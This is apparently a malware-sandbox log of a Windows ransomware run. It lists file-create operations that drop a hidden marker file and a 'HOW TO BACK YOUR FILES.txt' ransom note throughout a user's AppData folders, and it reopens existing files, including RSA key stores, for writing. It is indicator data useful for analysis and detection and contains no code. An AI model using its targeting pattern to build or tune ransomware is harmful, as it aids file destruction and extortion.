Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\InputMethod\Chs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Excel\XLSTART\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\ec679dec92129330b5b05a3aa424ac05_33d770d0-06bc-47c5-8714-222cdac43a71 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Credentials\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\AddIns\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\Logs\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Linguistics\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Headlights\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
